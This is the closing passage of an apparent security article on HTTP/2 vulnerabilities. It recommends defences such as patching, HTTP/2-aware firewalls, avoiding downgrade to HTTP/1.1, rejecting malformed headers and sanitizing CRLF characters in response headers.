Any new technology exposes a fresh attack surface to the cyber world. Even though HTTP/2 improved website performance, protocol implementation flaws and misconfigurations have exposed websites using HTTP/2 to greater security risks; applications that were secure before have become insecure in some respects. A whole new set of vulnerabilities also arises when the HTTP/2 protocol is not implemented end to end and downgrading is involved. Throughout this article, we have tried to showcase some of the security vulnerabilities associated with the HTTP/2 protocol. It is essential for any organization to be aware of these loopholes and to act promptly to prevent larger cyber-attacks. Below are a few of the mitigation techniques we would recommend to anyone who wants to secure a website running HTTP/2.

It is always recommended to install patches and upgrade to the latest versions per the product instructions. Implementing a web application firewall that supports the HTTP/2 protocol can also help prevent denial-of-service attacks.

Most HTTP/2 vulnerabilities are caused by downgrading the protocol to HTTP/1.1, so avoiding downgrading and using HTTP/2 end to end reduces exposure. If the HTTP/2 server must still support downgrading, enforce character restrictions on the resulting HTTP/1.1 messages, such as rejecting requests that contain newlines in headers, colons in header names, or spaces in the request method. Another preventive technique is to avoid placing user input directly into response headers; where that is unavoidable, sanitize the CRLF characters before they reach the header by encoding those special characters. Developers can also move to a programming language version whose header-setting functions do not allow CR and LF to be injected.
